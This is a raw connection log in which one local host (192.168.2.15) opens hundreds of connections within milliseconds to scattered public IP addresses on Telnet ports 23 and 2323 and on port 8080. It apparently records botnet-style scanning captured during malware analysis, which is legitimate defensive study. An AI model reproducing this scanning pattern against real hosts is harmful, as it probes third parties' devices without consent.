Feb 25, 2024 19:02:17.877223969 CET	6758	8080	192.168.2.15	94.115.92.224
Feb 25, 2024 19:02:17.877223969 CET	6758	8080	192.168.2.15	95.231.243.84
Feb 25, 2024 19:02:17.877223969 CET	58983	23	192.168.2.15	141.119.165.21
Feb 25, 2024 19:02:17.877223969 CET	58983	23	192.168.2.15	41.180.227.55
Feb 25, 2024 19:02:17.877223969 CET	6758	8080	192.168.2.15	95.109.198.187
Feb 25, 2024 19:02:17.877223969 CET	6758	8080	192.168.2.15	62.57.17.50
Feb 25, 2024 19:02:17.877223969 CET	6758	8080	192.168.2.15	85.64.135.222
Feb 25, 2024 19:02:17.877223969 CET	6758	8080	192.168.2.15	85.147.117.169
Feb 25, 2024 19:02:17.877235889 CET	58983	2323	192.168.2.15	71.233.4.194
Feb 25, 2024 19:02:17.877235889 CET	6758	8080	192.168.2.15	85.24.126.48
Feb 25, 2024 19:02:17.877235889 CET	6758	8080	192.168.2.15	94.202.63.158
Feb 25, 2024 19:02:17.877235889 CET	58983	23	192.168.2.15	48.84.44.124
Feb 25, 2024 19:02:17.877235889 CET	58983	23	192.168.2.15	76.140.182.168
Feb 25, 2024 19:02:17.877235889 CET	6758	8080	192.168.2.15	95.232.218.99
Feb 25, 2024 19:02:17.877235889 CET	6758	8080	192.168.2.15	85.161.24.90
Feb 25, 2024 19:02:17.877235889 CET	6758	8080	192.168.2.15	94.123.62.91
Feb 25, 2024 19:02:17.877289057 CET	6758	8080	192.168.2.15	95.224.222.239
Feb 25, 2024 19:02:17.877289057 CET	58983	23	192.168.2.15	47.101.172.225
Feb 25, 2024 19:02:17.877289057 CET	6758	8080	192.168.2.15	95.176.46.137
Feb 25, 2024 19:02:17.877289057 CET	58983	23	192.168.2.15	144.172.65.80
Feb 25, 2024 19:02:17.877289057 CET	6758	8080	192.168.2.15	31.48.140.135
Feb 25, 2024 19:02:17.877289057 CET	58983	23	192.168.2.15	88.3.230.225
Feb 25, 2024 19:02:17.877289057 CET	6758	8080	192.168.2.15	94.61.67.176
Feb 25, 2024 19:02:17.877289057 CET	6758	8080	192.168.2.15	95.31.51.156
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	95.85.39.147
Feb 25, 2024 19:02:17.877294064 CET	58983	23	192.168.2.15	96.105.186.173
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	95.182.30.50
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	31.2.135.243
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	85.9.251.30
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	62.111.92.178
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	85.47.89.73
Feb 25, 2024 19:02:17.877294064 CET	6758	8080	192.168.2.15	95.130.55.133
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	85.178.105.115
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	95.216.142.57
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	31.252.62.57
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	62.165.210.188
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	31.255.213.158
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	31.211.135.198
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	85.75.26.74
Feb 25, 2024 19:02:17.877299070 CET	6758	8080	192.168.2.15	95.190.213.224
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	31.114.159.248
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	31.14.4.32
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	94.21.71.134
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	62.93.90.167
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	95.225.120.164
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	94.42.213.133
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	62.154.220.31
Feb 25, 2024 19:02:17.877304077 CET	6758	8080	192.168.2.15	95.143.235.208
Feb 25, 2024 19:02:17.877314091 CET	6758	8080	192.168.2.15	31.235.175.131
Feb 25, 2024 19:02:17.877314091 CET	58983	23	192.168.2.15	124.4.131.161
Feb 25, 2024 19:02:17.877314091 CET	6758	8080	192.168.2.15	94.61.76.251
Feb 25, 2024 19:02:17.877315998 CET	58983	23	192.168.2.15	144.106.36.93
Feb 25, 2024 19:02:17.877314091 CET	58983	23	192.168.2.15	25.232.119.9
Feb 25, 2024 19:02:17.877315998 CET	6758	8080	192.168.2.15	85.219.126.112
Feb 25, 2024 19:02:17.877315044 CET	58983	23	192.168.2.15	142.118.228.28
Feb 25, 2024 19:02:17.877315998 CET	6758	8080	192.168.2.15	95.39.54.200
Feb 25, 2024 19:02:17.877315044 CET	6758	8080	192.168.2.15	95.94.39.250
Feb 25, 2024 19:02:17.877315998 CET	58983	23	192.168.2.15	36.177.20.174
Feb 25, 2024 19:02:17.877315044 CET	58983	23	192.168.2.15	136.36.40.43
Feb 25, 2024 19:02:17.877315998 CET	6758	8080	192.168.2.15	31.107.249.1
Feb 25, 2024 19:02:17.877315044 CET	6758	8080	192.168.2.15	31.74.215.24
Feb 25, 2024 19:02:17.877315998 CET	58983	2323	192.168.2.15	129.159.124.60
Feb 25, 2024 19:02:17.877315998 CET	6758	8080	192.168.2.15	94.33.46.175
Feb 25, 2024 19:02:17.877315998 CET	58983	23	192.168.2.15	81.7.70.111
Feb 25, 2024 19:02:17.877324104 CET	6758	8080	192.168.2.15	31.17.84.186
Feb 25, 2024 19:02:17.877324104 CET	6758	8080	192.168.2.15	62.181.147.52
Feb 25, 2024 19:02:17.877324104 CET	6758	8080	192.168.2.15	31.208.236.149
Feb 25, 2024 19:02:17.877325058 CET	6758	8080	192.168.2.15	31.200.221.55
Feb 25, 2024 19:02:17.877325058 CET	6758	8080	192.168.2.15	31.191.138.98
Feb 25, 2024 19:02:17.877325058 CET	6758	8080	192.168.2.15	85.79.63.28
Feb 25, 2024 19:02:17.877325058 CET	6758	8080	192.168.2.15	62.244.115.220
Feb 25, 2024 19:02:17.877325058 CET	6758	8080	192.168.2.15	62.186.179.146
Feb 25, 2024 19:02:17.877351046 CET	6758	8080	192.168.2.15	94.247.196.243
Feb 25, 2024 19:02:17.877351046 CET	6758	8080	192.168.2.15	94.147.232.43
Feb 25, 2024 19:02:17.877351046 CET	6758	8080	192.168.2.15	85.198.237.115
Feb 25, 2024 19:02:17.877351046 CET	6758	8080	192.168.2.15	94.7.65.50
Feb 25, 2024 19:02:17.877351046 CET	6758	8080	192.168.2.15	95.251.154.58
Feb 25, 2024 19:02:17.877351046 CET	58983	23	192.168.2.15	82.205.100.208
Feb 25, 2024 19:02:17.877351046 CET	58983	23	192.168.2.15	166.57.69.33
Feb 25, 2024 19:02:17.877351046 CET	58983	23	192.168.2.15	52.14.134.95
Feb 25, 2024 19:02:17.877403975 CET	6758	8080	192.168.2.15	85.35.79.157
Feb 25, 2024 19:02:17.877403975 CET	58983	23	192.168.2.15	145.80.57.153
Feb 25, 2024 19:02:17.877403975 CET	58983	23	192.168.2.15	105.223.161.26
Feb 25, 2024 19:02:17.877403975 CET	58983	23	192.168.2.15	151.118.49.107
Feb 25, 2024 19:02:17.877403975 CET	6758	8080	192.168.2.15	85.185.61.235
Feb 25, 2024 19:02:17.877403975 CET	58983	2323	192.168.2.15	198.89.176.111
Feb 25, 2024 19:02:17.877403975 CET	6758	8080	192.168.2.15	85.167.35.82
Feb 25, 2024 19:02:17.877403975 CET	58983	23	192.168.2.15	73.110.209.102
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	94.121.100.30
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	62.172.44.221
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	95.177.105.161
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	31.166.38.159
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	85.77.154.130
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	85.193.74.23
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	85.5.175.194
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	31.135.102.191
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	95.82.126.13
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	31.138.218.212
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	85.228.86.175
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	31.84.13.93
Feb 25, 2024 19:02:17.877414942 CET	6758	8080	192.168.2.15	94.228.167.249
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	95.112.165.229
Feb 25, 2024 19:02:17.877414942 CET	6758	8080	192.168.2.15	95.14.144.215
Feb 25, 2024 19:02:17.877413988 CET	6758	8080	192.168.2.15	95.204.194.159
Feb 25, 2024 19:02:17.877428055 CET	58983	23	192.168.2.15	201.220.22.250
Feb 25, 2024 19:02:17.877428055 CET	58983	23	192.168.2.15	94.159.140.186
Feb 25, 2024 19:02:17.877428055 CET	6758	8080	192.168.2.15	94.200.78.160
Feb 25, 2024 19:02:17.877428055 CET	6758	8080	192.168.2.15	85.67.83.179
Feb 25, 2024 19:02:17.877428055 CET	6758	8080	192.168.2.15	94.61.70.194
Feb 25, 2024 19:02:17.877429962 CET	6758	8080	192.168.2.15	95.246.51.215
Feb 25, 2024 19:02:17.877428055 CET	6758	8080	192.168.2.15	85.64.132.91
Feb 25, 2024 19:02:17.877429962 CET	58983	23	192.168.2.15	5.210.4.39
Feb 25, 2024 19:02:17.877428055 CET	6758	8080	192.168.2.15	95.24.145.110
Feb 25, 2024 19:02:17.877429962 CET	58983	23	192.168.2.15	46.255.101.180
Feb 25, 2024 19:02:17.877428055 CET	58983	23	192.168.2.15	89.215.19.1
Feb 25, 2024 19:02:17.877429962 CET	6758	8080	192.168.2.15	95.71.100.148
Feb 25, 2024 19:02:17.877429962 CET	58983	23	192.168.2.15	88.59.130.175
Feb 25, 2024 19:02:17.877429962 CET	58983	23	192.168.2.15	116.101.84.57
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	62.241.33.131
Feb 25, 2024 19:02:17.877429962 CET	58983	23	192.168.2.15	177.84.19.157
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	62.253.2.130
Feb 25, 2024 19:02:17.877429962 CET	58983	23	192.168.2.15	218.240.136.150
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	85.27.161.167
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	95.116.93.75
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	95.76.253.216
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	94.91.12.84
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	62.159.230.150
Feb 25, 2024 19:02:17.877433062 CET	6758	8080	192.168.2.15	62.15.12.24
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	95.130.147.74
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	95.198.108.0
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	85.218.231.77
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	62.177.64.69
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	62.121.9.171
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	31.194.131.49
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	62.239.199.20
Feb 25, 2024 19:02:17.877438068 CET	6758	8080	192.168.2.15	95.243.18.22
Feb 25, 2024 19:02:17.877440929 CET	6758	8080	192.168.2.15	62.198.234.140
Feb 25, 2024 19:02:17.877440929 CET	58983	23	192.168.2.15	155.179.115.148
Feb 25, 2024 19:02:17.877440929 CET	6758	8080	192.168.2.15	85.98.221.14
Feb 25, 2024 19:02:17.877440929 CET	58983	23	192.168.2.15	76.206.48.83
Feb 25, 2024 19:02:17.877440929 CET	6758	8080	192.168.2.15	95.92.88.154
Feb 25, 2024 19:02:17.877440929 CET	58983	23	192.168.2.15	198.230.221.4
Feb 25, 2024 19:02:17.877440929 CET	58983	23	192.168.2.15	47.55.172.229
Feb 25, 2024 19:02:17.877440929 CET	6758	8080	192.168.2.15	62.104.24.85
Feb 25, 2024 19:02:17.877460957 CET	58983	23	192.168.2.15	51.8.192.149
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	31.58.69.233
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	85.1.95.161
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	62.182.126.102
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	85.39.123.194
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	31.157.160.187
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	31.78.231.47
Feb 25, 2024 19:02:17.877460957 CET	6758	8080	192.168.2.15	62.210.52.92
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	62.128.74.178
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	94.105.22.96
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	95.95.104.97
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	31.20.152.117
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	62.169.184.247
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	31.3.198.43
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	95.26.86.110
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	85.204.226.115
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	95.73.109.27
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	31.33.92.71
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	85.26.117.149
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	85.38.21.30
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	31.142.158.106
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	95.143.53.117
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	95.212.212.30
Feb 25, 2024 19:02:17.877489090 CET	6758	8080	192.168.2.15	62.175.138.237
Feb 25, 2024 19:02:17.877511978 CET	6758	8080	192.168.2.15	95.16.179.70
Feb 25, 2024 19:02:17.877511978 CET	6758	8080	192.168.2.15	62.37.202.20
Feb 25, 2024 19:02:17.877511978 CET	6758	8080	192.168.2.15	95.112.9.10
Feb 25, 2024 19:02:17.877511978 CET	6758	8080	192.168.2.15	94.45.110.184
Feb 25, 2024 19:02:17.877511978 CET	6758	8080	192.168.2.15	31.38.45.194
Feb 25, 2024 19:02:17.877511978 CET	6758	8080	192.168.2.15	31.18.164.38
Feb 25, 2024 19:02:17.877512932 CET	6758	8080	192.168.2.15	62.194.37.251
Feb 25, 2024 19:02:17.877512932 CET	6758	8080	192.168.2.15	94.81.97.28
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	85.85.37.204
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	94.184.205.198
Feb 25, 2024 19:02:17.877521992 CET	58983	23	192.168.2.15	196.198.103.97
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	31.127.235.35
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	95.222.238.41
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	31.36.243.137
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	95.42.56.9
Feb 25, 2024 19:02:17.877521992 CET	6758	8080	192.168.2.15	85.16.146.48
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	85.225.208.118
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	95.134.192.224
Feb 25, 2024 19:02:17.877532959 CET	58983	23	192.168.2.15	190.235.112.142
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	62.226.129.108
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	95.111.4.200
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	94.154.155.11
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	62.71.76.133
Feb 25, 2024 19:02:17.877532959 CET	6758	8080	192.168.2.15	85.78.253.23
Feb 25, 2024 19:02:17.877542019 CET	6758	8080	192.168.2.15	31.245.18.99
Feb 25, 2024 19:02:17.877542019 CET	58983	23	192.168.2.15	187.224.26.144
Feb 25, 2024 19:02:17.877542019 CET	6758	8080	192.168.2.15	85.93.44.47
Feb 25, 2024 19:02:17.877542019 CET	58983	23	192.168.2.15	168.75.176.236
Feb 25, 2024 19:02:17.877542019 CET	6758	8080	192.168.2.15	62.4.65.165
Feb 25, 2024 19:02:17.877542019 CET	6758	8080	192.168.2.15	85.249.220.142
Feb 25, 2024 19:02:17.877542019 CET	6758	8080	192.168.2.15	85.134.45.163
Feb 25, 2024 19:02:17.877542019 CET	58983	2323	192.168.2.15	204.243.158.17
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	31.86.249.134
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	31.211.9.199
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	85.92.94.81
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	95.226.190.9
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	95.56.138.141
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	94.54.129.62
Feb 25, 2024 19:02:17.877573967 CET	6758	8080	192.168.2.15	95.67.255.84
Feb 25, 2024 19:02:17.877574921 CET	6758	8080	192.168.2.15	31.255.20.83
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	85.135.84.88
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	94.192.228.47
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	85.45.26.136
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	62.79.48.53
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	95.135.108.152
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	94.119.81.61
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	85.43.31.6
Feb 25, 2024 19:02:17.877585888 CET	6758	8080	192.168.2.15	85.135.132.218
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	95.118.218.185
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	31.255.211.93
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	31.95.33.99
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	85.250.84.115
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	31.166.60.191
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	62.154.184.217
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	62.214.42.212
Feb 25, 2024 19:02:17.877590895 CET	6758	8080	192.168.2.15	94.118.69.63
Feb 25, 2024 19:02:17.877599001 CET	6758	8080	192.168.2.15	95.34.98.16
Feb 25, 2024 19:02:17.877599001 CET	6758	8080	192.168.2.15	94.250.168.95
Feb 25, 2024 19:02:17.877599001 CET	58983	2323	192.168.2.15	18.98.168.127
Feb 25, 2024 19:02:17.877599001 CET	58983	23	192.168.2.15	139.7.54.121
Feb 25, 2024 19:02:17.877599001 CET	6758	8080	192.168.2.15	31.127.167.24
Feb 25, 2024 19:02:17.877599001 CET	6758	8080	192.168.2.15	85.246.12.69
Feb 25, 2024 19:02:17.877599001 CET	6758	8080	192.168.2.15	94.109.178.155
Feb 25, 2024 19:02:17.877599001 CET	6758	8080	192.168.2.15	85.168.191.100
Feb 25, 2024 19:02:17.877654076 CET	6758	8080	192.168.2.15	31.152.134.251
Feb 25, 2024 19:02:17.877654076 CET	6758	8080	192.168.2.15	94.108.230.218
Feb 25, 2024 19:02:17.877654076 CET	6758	8080	192.168.2.15	31.224.110.94
Feb 25, 2024 19:02:17.877654076 CET	6758	8080	192.168.2.15	94.77.124.28
Feb 25, 2024 19:02:17.877654076 CET	6758	8080	192.168.2.15	95.42.5.66
Feb 25, 2024 19:02:17.877654076 CET	58983	23	192.168.2.15	200.203.38.193
Feb 25, 2024 19:02:17.877654076 CET	6758	8080	192.168.2.15	95.219.234.232
Feb 25, 2024 19:02:17.877655029 CET	6758	8080	192.168.2.15	85.66.41.72
Feb 25, 2024 19:02:17.877666950 CET	58983	23	192.168.2.15	99.85.10.95
Feb 25, 2024 19:02:17.877666950 CET	58983	23	192.168.2.15	117.157.169.49
Feb 25, 2024 19:02:17.877666950 CET	6758	8080	192.168.2.15	62.92.162.158
Feb 25, 2024 19:02:17.877666950 CET	6758	8080	192.168.2.15	62.193.188.24
Feb 25, 2024 19:02:17.877666950 CET	6758	8080	192.168.2.15	85.166.59.36
Feb 25, 2024 19:02:17.877666950 CET	6758	8080	192.168.2.15	94.53.192.199
Feb 25, 2024 19:02:17.877666950 CET	6758	8080	192.168.2.15	85.155.180.160
Feb 25, 2024 19:02:17.877666950 CET	6758	8080	192.168.2.15	95.203.68.93
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	85.110.210.218
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	31.131.148.121
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	94.115.252.55
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	31.224.58.44
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	31.29.63.48
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	85.142.217.131
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	31.81.109.166
Feb 25, 2024 19:02:17.877680063 CET	6758	8080	192.168.2.15	31.161.30.20
Feb 25, 2024 19:02:17.877696037 CET	6758	8080	192.168.2.15	62.242.206.11
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	62.158.147.52
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	31.233.21.142
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	85.134.172.172
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	62.57.41.248
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	94.154.131.183
Feb 25, 2024 19:02:17.877696991 CET	58983	23	192.168.2.15	95.53.199.101
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	31.239.39.247
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	31.160.127.88
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	31.221.194.223
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	31.158.129.235
Feb 25, 2024 19:02:17.877705097 CET	6758	8080	192.168.2.15	62.228.206.128
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	62.116.197.196
Feb 25, 2024 19:02:17.877705097 CET	6758	8080	192.168.2.15	94.185.226.208
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	94.140.65.221
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	95.94.255.61
Feb 25, 2024 19:02:17.877705097 CET	6758	8080	192.168.2.15	85.177.71.222
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	95.223.113.216
Feb 25, 2024 19:02:17.877705097 CET	6758	8080	192.168.2.15	94.34.97.216
Feb 25, 2024 19:02:17.877696991 CET	6758	8080	192.168.2.15	95.209.12.63
Feb 25, 2024 19:02:17.877705097 CET	6758	8080	192.168.2.15	85.91.215.131
Feb 25, 2024 19:02:17.877724886 CET	6758	8080	192.168.2.15	94.137.110.216
Feb 25, 2024 19:02:17.877724886 CET	6758	8080	192.168.2.15	94.153.209.198
Feb 25, 2024 19:02:17.877724886 CET	6758	8080	192.168.2.15	31.188.223.156
Feb 25, 2024 19:02:17.877724886 CET	6758	8080	192.168.2.15	85.77.61.4
Feb 25, 2024 19:02:17.877724886 CET	6758	8080	192.168.2.15	85.11.231.83
Feb 25, 2024 19:02:17.877726078 CET	6758	8080	192.168.2.15	94.239.231.76
Feb 25, 2024 19:02:17.877726078 CET	6758	8080	192.168.2.15	85.203.81.77
Feb 25, 2024 19:02:17.877726078 CET	6758	8080	192.168.2.15	31.182.30.106
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	94.153.155.67
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	94.26.65.121
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	95.57.166.103
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	31.75.13.35
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	31.202.238.97
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	85.218.98.28
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	31.83.65.177
Feb 25, 2024 19:02:17.877765894 CET	6758	8080	192.168.2.15	85.190.242.59
Feb 25, 2024 19:02:17.877774954 CET	6758	8080	192.168.2.15	31.112.127.42
Feb 25, 2024 19:02:17.877774954 CET	6758	8080	192.168.2.15	95.6.171.201
Feb 25, 2024 19:02:17.877775908 CET	6758	8080	192.168.2.15	31.187.171.6
Feb 25, 2024 19:02:17.877775908 CET	6758	8080	192.168.2.15	94.39.93.162
Feb 25, 2024 19:02:17.877775908 CET	6758	8080	192.168.2.15	62.24.5.233
Feb 25, 2024 19:02:17.877775908 CET	6758	8080	192.168.2.15	31.37.249.117
Feb 25, 2024 19:02:17.877775908 CET	6758	8080	192.168.2.15	94.244.1.13
Feb 25, 2024 19:02:17.877775908 CET	6758	8080	192.168.2.15	95.220.78.179
Feb 25, 2024 19:02:17.877780914 CET	6758	8080	192.168.2.15	62.228.237.242
Feb 25, 2024 19:02:17.877780914 CET	6758	8080	192.168.2.15	31.63.178.242
Feb 25, 2024 19:02:17.877789021 CET	58983	23	192.168.2.15	142.167.32.172
Feb 25, 2024 19:02:17.877789021 CET	6758	8080	192.168.2.15	94.192.142.66
Feb 25, 2024 19:02:17.877789021 CET	58983	23	192.168.2.15	42.26.33.105
Feb 25, 2024 19:02:17.877789021 CET	6758	8080	192.168.2.15	94.155.143.170
Feb 25, 2024 19:02:17.877789021 CET	6758	8080	192.168.2.15	62.232.174.158
Feb 25, 2024 19:02:17.877789021 CET	6758	8080	192.168.2.15	95.40.12.248
Feb 25, 2024 19:02:17.877789021 CET	6758	8080	192.168.2.15	85.206.244.97
Feb 25, 2024 19:02:17.877789021 CET	6758	8080	192.168.2.15	95.237.246.197
Feb 25, 2024 19:02:17.877794981 CET	6758	8080	192.168.2.15	62.137.230.90
Feb 25, 2024 19:02:17.877794981 CET	6758	8080	192.168.2.15	85.185.8.71
Feb 25, 2024 19:02:17.877794981 CET	6758	8080	192.168.2.15	95.98.40.105
Feb 25, 2024 19:02:17.877794981 CET	6758	8080	192.168.2.15	31.31.96.139
Feb 25, 2024 19:02:17.877794981 CET	6758	8080	192.168.2.15	31.90.120.195
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	62.193.205.77
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	62.30.84.7
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	31.24.231.90
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	31.186.252.87
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	85.69.185.147
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	85.65.172.130
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	85.36.24.70
Feb 25, 2024 19:02:17.877804995 CET	6758	8080	192.168.2.15	85.181.221.110
Feb 25, 2024 19:02:17.877815962 CET	6758	8080	192.168.2.15	85.54.131.176
Feb 25, 2024 19:02:17.877815962 CET	6758	8080	192.168.2.15	31.59.65.66
Feb 25, 2024 19:02:17.877820969 CET	6758	8080	192.168.2.15	31.76.173.10
Feb 25, 2024 19:02:17.877820969 CET	6758	8080	192.168.2.15	95.231.51.107
Feb 25, 2024 19:02:17.877840042 CET	6758	8080	192.168.2.15	31.76.121.77
Feb 25, 2024 19:02:17.877840042 CET	6758	8080	192.168.2.15	31.183.131.3
Feb 25, 2024 19:02:17.877840042 CET	6758	8080	192.168.2.15	95.24.109.10
Feb 25, 2024 19:02:17.877846003 CET	6758	8080	192.168.2.15	85.191.17.179
Feb 25, 2024 19:02:17.877846003 CET	6758	8080	192.168.2.15	85.178.122.36
Feb 25, 2024 19:02:17.877846003 CET	6758	8080	192.168.2.15	85.88.183.4
